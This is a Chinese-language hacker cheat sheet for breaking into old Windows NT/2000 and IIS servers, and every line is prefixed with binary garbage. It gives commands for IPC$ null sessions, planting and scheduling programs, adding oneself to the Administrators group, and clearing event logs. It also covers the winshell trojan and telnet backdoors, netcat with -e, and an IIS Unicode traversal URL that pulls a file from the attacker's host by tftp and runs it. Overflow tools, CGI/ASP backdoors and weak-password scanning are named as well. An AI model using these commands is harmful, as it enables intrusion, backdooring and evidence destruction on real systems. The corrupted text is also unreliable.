网管和黑客都必须知道的命令
P�<PZ4hNx� 常用的几条NET命令:
p�'R<y�B)V jW��rU'�X� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
��X)b��$CG �P[3i!�"O> (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
=���~1E�pZ r:H]`Uo'r� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
.�&^�p@�A~ 6w�^P{%�ul (查看远程主机时间) net time \\IP地址
��(�/]'�e} Z8SwW<{ $� (定时启动某个程序) at \\IP地址 02:18 readme.exe
�
�2v{�WX F��L�i'�}C (查看共享) net view \\IP地址
6<�lo0PQ"Z x92�^0c�Mf (查看netbios工作组列表) nbtstat -A IP地址
y]h0c<N��P !..<_�qf�w (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
:�K|
H/kht 'PF>#�X�'' (这两条把自己增加到管理员组): net user 用户名 密码 /add
5u!\c(TJ�+ c*�IrZm��� net localgroup Administrators 用户名 /add
f$�lb�.fy5 0S{23L�4C� (断开连接) net use \\IP地址\ipc$ /delete
-|��.�NwGh 8 .%0JJ�.3 扫尾:
5$�9�$R(KU 2"ax*MQH<^ del C:\winnt\system32\logfiles\*.*
+z�;*r8d<X �_T\��~�% del C:\winnt\ssytem32\config\*.evt
(nq��ry[g& ',EI[�
�]+ del C:\winnt\system32\dtclog\*.*
�Btm�,'kBG �_p )NZ7yC del C:\winnt\system32\*.log
rW?Wd��Eg j9
�nw,x�$ del C:\winnt\system32\*.txt
<%)vl� P#@ L���`1 ITz del C:\winnt\*.txt
`5Y��*)�
q !ho^�:}��m del C:\winnt\*.log
Qq��,��2V� �b��mG`:�_ 一、netsvc.exe
�z
CLaHx�! �� t��`o"K 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
$_�.t'�8F� 5�Tl5�T��& netsvc /list \\IP地址
b| L;*�<KU �s#X/
F��� netsvc schedule \\IP地址 /query
EFX2>&mWo8 [q9B�"��@X netsvc \\IP地址 schedule /start
0*{�(�R��# �\YvG�+7a� 二、OpenTelnet.exe
�OUB�Gb�ld D���3Q+K� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
&�N�}��"4 e�9L�X�0=� OpenTelnet \\IP地址 用户名 密码 1 7878
~`
tuPk�~l 0Ui.nz j�� 然后就可以telnet到主机的7878端口,进入DOS方式下:
$T�U�Yxf0q GHv�6UIe�& telnet IP地址 7878
x=*&#;�Y| !ku�}vT��e 三、winshell.exe
Tz,-��~�mc �`O�\>vn�� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
;<+efYmy�c zx#G�m=�H4 p Path (查看winshell主程序的路径信息)
{��5��dVK 't<iB&w�gF b reBoot (重新启动机器)
j�)J� |'b| �A]�B���eI d shutDown (关闭机器)
]��Uv,}W � L�)'G�_)Sl s Shell (执行后你就会看到可爱的“C:\>”)
�<pX�?x3-' rL���5=�8l x eXit (退出本次登录会话,此命令并不终止winshell的运行)
^�Om}9rXw1 L( 6b�2{�" CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
!f�~a3 {;j R~g|w4a@sC 四、3389登陆器,GUI方式登录远程主机的
!g�X�xM,R� \+o���\wTW 五、elsave.exe
����fK�/�: �t��c~gn!" 事件日志清除工具
�R��C_Pj)� SAm%$v�z%M elsave -s \\IP地址 -l "application" -C
"�c%wq���0 WDc[�+Xyw� elsave -s \\IP地址 -l "system" -C
XFhH+��4#] 2!%)�_<�� elsave -s \\IP地址 -l "security" -C
3bR�xV
@0. Gk�:�fw#R 执行后成功清除应用程序日志,系统日志,安全日志
N�M�. e��4 o0r&w�;�!� 六、hbulot.exe
Ct=bZW�"j/ �VEWW[�T� 开启win2kserver和winxp的3389服务
�4���%0s p hW*�o�;o7u hbulot [/r]
<'\Nv._2a� �u&~Xgq5�[ 使用/r表示安装完成后自动重起目标使设置生效。
�J^+w]2`�S F�,_L���}
七、nc.exe(netcat.exe)
f�`�qy~M&� -zK>{)Z=�q 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
D�.��K��e� ~n��
'�A1� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
I0
t#��{i HI5NWd�fRl 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
t'_Ec�YNS $yO����B�- 参数:
�t�24�`*'� �Q�a2�h#0j -e prog 程序重定向,一旦连接,就执行 [危险!!]
}�IygU 6{G Dw�
i-iA_q -g gateway source-routing hop point[s], up to 8
'��aN�k�U� Pt�"K+]�Ym -G num source-routing pointer: 4, 8, 12, ...
�h8V��*��$ ;+75�"=[YT -h 帮助信息
1Ek3�^TOv7 u�7e��$Mq -i secs 延时的间隔
VxY]0&�s�q 3,�p!Fun:r -l 监听模式,用于入站连接
Z
��`F[0- ��Fo3*PcUv -n 指定数字的IP地址,不能用hostname
*~8F.c���x O�?vh�]��o -o file 记录16进制的传输
Z}O]pm�>=G qG�X@mo(�{ -p port 本地端口号
h3F559bw/< O�>)eir�7
-r 任意指定本地及远程端口
5AT^puL]]� s9C^�Cy^su -s addr 本地源地址
��0�H_Ai=G q��T?{�}I -u UDP模式
6�lz�jaW5h �(a�Y�u[ML -v 详细输出——用两个-v可得到更详细的内容
Oti;wf G7o W�B:0}b0Gu -w secs timeout的时间
jr�6 0;oK+ ]t<=a6�<P -z 将输入输出关掉——用于扫描时
%;�&lVIU0� 八、TFTPD32.EXE
�&�S="]�*Z �_qB
��._� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�� ]]�p\1G ���th{J;a� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
U)d�cemQY� L����v+{@) 然后可以直接令文件运行:
,Ee�5}#dI� 2�*�sn�MA� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
mc]�+j,d�� H:~�bWd'iz 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�8cO?VH,nk |k�~AG�c�� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
[>�NMuw�tG ���%Za}q]? 一、一 Xscan命令行运行参数说明:
_sy{rnaqvb 4`�?�PtR�X 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�5�=;cN9M@ ztU"C��Ra8 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
qX��}3}�TL �bB4FjC': xscan -file <主机列表文件名> <检测项目> [其他选项]
@.������sn L\mF[Kd#+T 其中<检测项目> 含义如下:
F�K�L4`GEm \zU<o��~gs -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
&_�3#W.w~Z ;���8[VCU: -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
QYH#W�rIVx e\~nq�KCb� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
huqt�k4��u ��A^�}#��� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
)�i� /w:g> �]D�nAW'm� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
��[xGwqa03 gI7*zR�4D [其他选项] 含义如下:
�o;c"�-^>� OK4��r���) -v: 显示详细扫描进度
�,�LZA\XC� u'? �+JUd1 -p: 跳过Ping不通的主机
E$lbm>jsb$ '7��o�R�|I -o: 跳过没有检测到开放端口的主机
�9{(q[C5m� }�S iR;2�W -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
